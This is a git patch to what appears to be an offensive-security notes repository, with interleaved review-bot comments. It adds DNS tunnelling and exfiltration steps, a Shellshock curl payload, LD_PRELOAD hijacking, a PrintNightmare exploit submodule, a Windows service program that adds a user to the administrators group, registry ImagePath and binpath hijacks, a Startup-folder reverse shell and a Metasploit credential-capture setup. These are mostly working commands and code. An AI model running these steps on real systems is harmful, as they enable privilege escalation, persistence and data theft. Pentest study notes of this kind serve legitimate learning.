From 6b8f9472c7637ce9e69497bc1ea68a1abd07cf96 Mon Sep 17 00:00:00 2001
From: whx
Date: Sun, 31 Oct 2021 02:43:24 +0200
Subject: [PATCH] bump
---
 .gitmodules | 3 +
 exfiltration/dns/dns.md | 49 ++++++++++++
 exploit/binaries/r2.md | 48 ++++++++++++
 exploit/linux/ld_preload.md | 37 ++++++++-
 exploit/linux/shell_shock.md | 6 ++
 exploit/windows/CVE-2021-1675 | 1 +
 exploit/windows/service_escalation/service.c | 76 +++++++++++++++++++
 .../service_escalation/service_escalation.md | 19 +++++
 misc/hashcat_utils.md | 6 ++
 osint/spiderfoot.md | 8 ++
 .../priv_esc/docs/windows/windows_priv_esc.md | 24 ++++++
 stego/docs/outguess.md | 2 +
 12 files changed, 278 insertions(+), 1 deletion(-)
 create mode 100644 exfiltration/dns/dns.md
 create mode 100644 exploit/linux/shell_shock.md
 create mode 160000 exploit/windows/CVE-2021-1675
 create mode 100644 exploit/windows/service_escalation/service.c
 create mode 100644 exploit/windows/service_escalation/service_escalation.md
 create mode 100644 misc/hashcat_utils.md
 create mode 100644 osint/spiderfoot.md
 create mode 100644 stego/docs/outguess.md
diff --git a/.gitmodules b/.gitmodules
index c7aa350..117f855 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -49,3 +49,6 @@
 [submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
 path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
 url = https://github.com/linted/linuxprivchecker
+[submodule "exploit/windows/CVE-2021-1675"]
+ path = exploit/windows/CVE-2021-1675
+ url = https://github.com/calebstewart/CVE-2021-1675
diff --git a/exfiltration/dns/dns.md b/exfiltration/dns/dns.md
new file mode 100644
index 0000000..d5436f6
--- /dev/null
+++ b/exfiltration/dns/dns.md
@@ -0,0 +1,49 @@
+# DNS
+
+* [Root Servers](https://www.iana.org/domains/root/servers)
+* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
+* [Records](https://www.cloudflare.com/learning/dns/dns-records/)
+
+## Tunneling
+* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
+* Start server on an outside DNS server. This may be a evs.
+```sh
+iodined -b 47110-f 10.0.0.1 tunnel.test.com
+```
+* Use client via
+```sh
+iodine -f -r tunnel.test.com
+```
+* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
+* Client gets a tunnel IP in the range of `10.0.0.0/8`
+* Check connection via
+```sh
+ping
+```
+* Generate ssh-key and put in on the server
+* Dynamic port forwarding to server via
+```sh
+ssh @10.0.0.1 -D 8080
+```
+* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy
+
+## nslookup
+```sh
+nslookup type=txt
+```
+
+## Reverse lookup
+* Stored inside `PTR` record
+* Reverse IP may look like `.in-addr.arpa.`, but not via `drill` or `dig`
+```sh
+drill -x +short
+```
+
+## Exfiltration
+* Add data to UDP DNS requests
+* Capture traffic on an owned DNS server
+* `253` is the max length of a DNS name
+* Encode the payload to hide it
+
+## Infiltration
+* Inside `TXT` or any other possible records
diff --git a/exploit/binaries/r2.md b/exploit/binaries/r2.md
index db8f289..54bcba1 100644
--- a/exploit/binaries/r2.md
+++ b/exploit/binaries/r2.md
@@ -9,14 +9,47 @@ r2 -d
 ```sh
 aaa
 ```
+* Show all info
+```sh
+ia
+```
+* Search for strings
+```sh
+izz
+```
+* Main address
+```sh
+iM
+```
+* Entrypoint
+```sh
+ie
+```
+* Current memory address
+```sh
+s
+```
+* Show address of function or register, respectively
+```sh
+s
+sr
+```
 * Show main
 ```sh
 pdf @main
 ```
+* Show main and follwing functions
+```sh
+pd @main
+```
 * Breakpoint
 ```sh
 db 0xdeadbeef
 ```
+* Show all breakpoints
+```sh
+dbi
+```
 * Show rbp-0x4
 ```sh
 px @rbp-0x4
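Review bot: The `nslookup type=txt` line in the new nslookup section is missing the option dash; without it nslookup resolves the literal name `type=txt` instead of selecting the record type, so it should read `nslookup -type=txt <name>`. In the Tunneling section "This may be a evs." looks garbled (presumably "a VPS"), and `-b 47110-f` appears to have lost the space before `-f`. The Exfiltration section would benefit from naming the observable this technique produces, e.g. `* Tunnelled data appears as many long, high-entropy subdomain labels and an unusual TXT/NULL query rate towards a single zone, which is what DNS monitoring keys on`.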
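Review bot: "follwing" in the new bullet `* Show main and follwing functions` is a typo for "following". The bullet is also slightly misleading, since unlike `pdf` the `pd` command disassembles by instruction count from the current seek (the block size by default) rather than by function; `* Disassemble a block of instructions starting at main` describes `pd @main` more accurately.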
@@ -37,6 +70,21 @@ dr ```sh ood ``` +### Visual Mode +* Enter visual mode via `VV` +* Enter normal mode inside visual mode via `:` +* Add comment via `;` + +### Write Mode +* Enter write mode via `w` +* Write cache list via `wc` +* Alter/modify opcode at current seek via `wA` +* Use as follows +```sh +s +wx +dc +``` ## AT&T Instructions * leaq src, dst: this instruction sets dst to the address denoted by the expression in src diff --git a/exploit/linux/ld_preload.md b/exploit/linux/ld_preload.md index 394b45e..4e99b97 100644 --- a/exploit/linux/ld_preload.md +++ b/exploit/linux/ld_preload.md @@ -2,7 +2,11 @@ * Preload libs and do interpositioning of functions. -## Example +* `man ld.so` +* `man dlsym`, `dlsym()` calls the original function + +## Example 1 +* Interpositioning of `_init()` ```sh #include #include @@ -19,3 +23,34 @@ void _init() { * `sudo LD_PRELOAD=lib.so apache2` * `$ id` + +## Example 2 +* Interpositioning of `write()` +```C +#include +#include +#include // Contains _GNU_SOURCE from man dlsym +#include +ssize_t write(int fildes, const void *buf, size_t nbytes) +{ + ssize_t result; + do the thing; + return result; +} +``` +* In case the symbol lookup returns an error libdl is linked +```sh +gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl` +``` +## Preloading +* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows +* `LD_PRELOAD=./interpositioning.so ` +or +* `export LD_PRELOAD=$(pwd)/interpositioning.so` +or +* Global preload via `/etc/ld.so.preload` +or +* Change the preload path via `LD_PRELOAD_PATH` + +* Verify via `ldd ` + diff --git a/exploit/linux/shell_shock.md b/exploit/linux/shell_shock.md new file mode 100644 index 0000000..dfc0209 --- /dev/null +++ b/exploit/linux/shell_shock.md 
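Review bot: The compile line in the new Example 2 section of ld_preload.md ends with a stray backtick inside the code fence (`-o interpositioning.so -ldl``) and passes `-ldl` twice; `gcc -fPIC -shared -D_GNU_SOURCE interpositioning.c -o interpositioning.so -ldl` is enough. `LD_PRELOAD_PATH` in the Preloading section is not a variable ld.so(8) documents as far as I know — the loader honours `LD_PRELOAD` and `/etc/ld.so.preload` for preloading and `LD_LIBRARY_PATH` for the search path — so please verify that bullet. Since the section already lists `/etc/ld.so.preload`, a line on the defensive side would round it out: `* LD_PRELOAD in the environment of privileged processes and any entry in /etc/ld.so.preload load code into every dynamically linked program and are standard integrity-monitoring targets`.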
@@ -0,0 +1,6 @@
+# Shell Shock
+
+* Check target via
+```sh
+curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http:///cgi-bin/test/test.cgi
+```
diff --git a/exploit/windows/CVE-2021-1675 b/exploit/windows/CVE-2021-1675
new file mode 160000
index 0000000..ed724e5
--- /dev/null
+++ b/exploit/windows/CVE-2021-1675
@@ -0,0 +1 @@
+Subproject commit ed724e576adb377b9c5b91f4343012108307fff9
diff --git a/exploit/windows/service_escalation/service.c b/exploit/windows/service_escalation/service.c
new file mode 100644
index 0000000..9e23ce6
--- /dev/null
+++ b/exploit/windows/service_escalation/service.c
@@ -0,0 +1,76 @@
+#include
+#include
+
+#define SLEEP_TIME 5000
+
+SERVICE_STATUS ServiceStatus;
+SERVICE_STATUS_HANDLE hStatus;
+
+void ServiceMain(int argc, char** argv);
+void ControlHandler(DWORD request);
+
+//add the payload here
+int Run()
+{
+ system("cmd.exe /k net localgroup administrators user /add");
+ return 0;
+}
+
+int main()
+{
+ SERVICE_TABLE_ENTRY ServiceTable[2];
+ ServiceTable[0].lpServiceName = "MyService";
+ ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
+
+ ServiceTable[1].lpServiceName = NULL;
+ ServiceTable[1].lpServiceProc = NULL;
+
+ StartServiceCtrlDispatcher(ServiceTable);
+ return 0;
+}
+
+void ServiceMain(int argc, char** argv)
+{
+ ServiceStatus.dwServiceType = SERVICE_WIN32;
+ ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+ ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+ ServiceStatus.dwWin32ExitCode = 0;
+ ServiceStatus.dwServiceSpecificExitCode = 0;
+ ServiceStatus.dwCheckPoint = 0;
+ ServiceStatus.dwWaitHint = 0;
+
+ hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
+ Run();
+
+ ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+ SetServiceStatus (hStatus, &ServiceStatus);
+
+ while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
+ {
+ Sleep(SLEEP_TIME);
+ }
+ return;
+}
+
+void ControlHandler(DWORD request)
+{
+ switch(request)
+ {
+ case SERVICE_CONTROL_STOP:
+ ServiceStatus.dwWin32ExitCode = 0;
+ ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+ SetServiceStatus (hStatus, &ServiceStatus);
+ return;
+
+ case SERVICE_CONTROL_SHUTDOWN:
+ ServiceStatus.dwWin32ExitCode = 0;
+ ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+ SetServiceStatus (hStatus, &ServiceStatus);
+ return;
+
+ default:
+ break;
+ }
+ SetServiceStatus (hStatus, &ServiceStatus);
+ return;
+}
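Review bot: The return value of `RegisterServiceCtrlHandler` in ServiceMain is never checked; when it fails `hStatus` is NULL, every later `SetServiceStatus(hStatus, ...)` fails silently and the `while` loop still spins on a status the SCM never saw, so add `if (!hStatus) return;` directly after the call, and likewise test `StartServiceCtrlDispatcher` in main, which fails when the binary is launched from a console instead of by the SCM. The `(LPSERVICE_MAIN_FUNCTION)` and `(LPHANDLER_FUNCTION)` casts paper over a prototype mismatch — `ServiceMain(int, char**)` versus `VOID WINAPI (DWORD, LPTSTR*)`, and `ControlHandler` lacking `WINAPI` — and declaring both with the Win32 prototypes removes the casts. The only comment, `//add the payload here`, says nothing about the file; a header such as `/* Minimal SCM service skeleton: the SCM calls ServiceMain, which runs Run() under the service's configured account before reporting SERVICE_RUNNING */` would tell a reader what the template does and when Run() executes.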
diff --git a/exploit/windows/service_escalation/service_escalation.md b/exploit/windows/service_escalation/service_escalation.md
new file mode 100644
index 0000000..8c1e996
--- /dev/null
+++ b/exploit/windows/service_escalation/service_escalation.md
@@ -0,0 +1,19 @@
+# Service Escalation
+
+* Check service control permission
+```sh
+Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
+```
+* Add command to system() function inside `service.c`, e.g. add user to administrators group
+```sh
+cmd.exe /k net localgroup administrators user /add
+```
+* Compile via
+```sh
+x86_64-w64-mingw32-gcc service.c service.exe
+```
+* Upload to target and
+```sh
+reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
+sc start regsvc
+```
diff --git a/misc/hashcat_utils.md b/misc/hashcat_utils.md
new file mode 100644
index 0000000..96f02cc
--- /dev/null
+++ b/misc/hashcat_utils.md
@@ -0,0 +1,6 @@
+# Hashcat Utilities
+
+* Combine wordlists
+```sh
+combinator wordlist.txt otherwordlist.txt > newwordlist.txt
+```
diff --git a/osint/spiderfoot.md b/osint/spiderfoot.md
new file mode 100644
index 0000000..c94964d
--- /dev/null
+++ b/osint/spiderfoot.md
@@ -0,0 +1,8 @@
+# Spiderfoot
+
+* OSINT online spider
+* [Repo & releases](https://github.com/smicallef/spiderfoot.git)
+* Start server locally via
+```sh
+python sf.py -l 127.0.0.1:5000
+```
diff --git a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
index 3804879..3ebdf78 100644
--- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
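Review bot: The compile line `x86_64-w64-mingw32-gcc service.c service.exe` in service_escalation.md lacks `-o`, so gcc treats `service.exe` as a second input file and the step fails as written; it should be `x86_64-w64-mingw32-gcc service.c -o service.exe`. The first bullet says "Check service control permission", but `Get-Acl` on `hklm:\System\CurrentControlSet\services\regsvc` inspects the ACL of the registry key, not the service object's security descriptor — these are different weaknesses (a writable key versus `SERVICE_CHANGE_CONFIG`), and the bullet should say which one it is testing. The `reg add ... /v ImagePath` step is also the detection point for this whole chain: a write to a service's ImagePath under `HKLM\SYSTEM\CurrentControlSet\services` from anything other than an installer is a standard registry-monitoring rule (Sysmon Event ID 13), which the page could note next to that command.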
@@ -75,3 +75,27 @@ runas /savecred /user: reverse_shell.exe
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
+
+### accesschk64 Permissions
+* Check access to files and folders
+```sh
+accesschk64 -wvu "file.exe"
+```
+* If permission `SERVICE_CHANGE_CONFIG` is set
+```sh
+ sc config binpath="net localgroup administrators user /add"
+```
+* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
+* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
+
+### Startup Application
+* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
+
+### Password Mining
+* Set up metasploit
+```sh
+use auxiliary/server/capture/http_basic
+set srvport 7777
+set uripath pass
+```
+* Visit site on target
diff --git a/stego/docs/outguess.md b/stego/docs/outguess.md
new file mode 100644
index 0000000..c056ec3
--- /dev/null
+++ b/stego/docs/outguess.md
@@ -0,0 +1,2 @@
+# Outguess
+`man outguess`
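Review bot: The two accesschk64 bullets in windows_priv_esc.md describe different checks without saying so: `accesschk64 -wvu "file.exe"` reports write access on a file, whereas `SERVICE_CHANGE_CONFIG` is a right on the service object, so the second bullet should state that it refers to the service's ACL rather than the binary's. The sentence `Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.` is missing a noun after `service_escalation` (directory or page) and a space after the period. "Put reverse shell instead of an executable" under Startup Application is hard to parse; `* Placing an executable in the Startup folder runs it at every logon of that user` states the mechanism, and both this folder and a replaced service binary are standard file-integrity-monitoring locations, which is worth a line for readers on the defensive side.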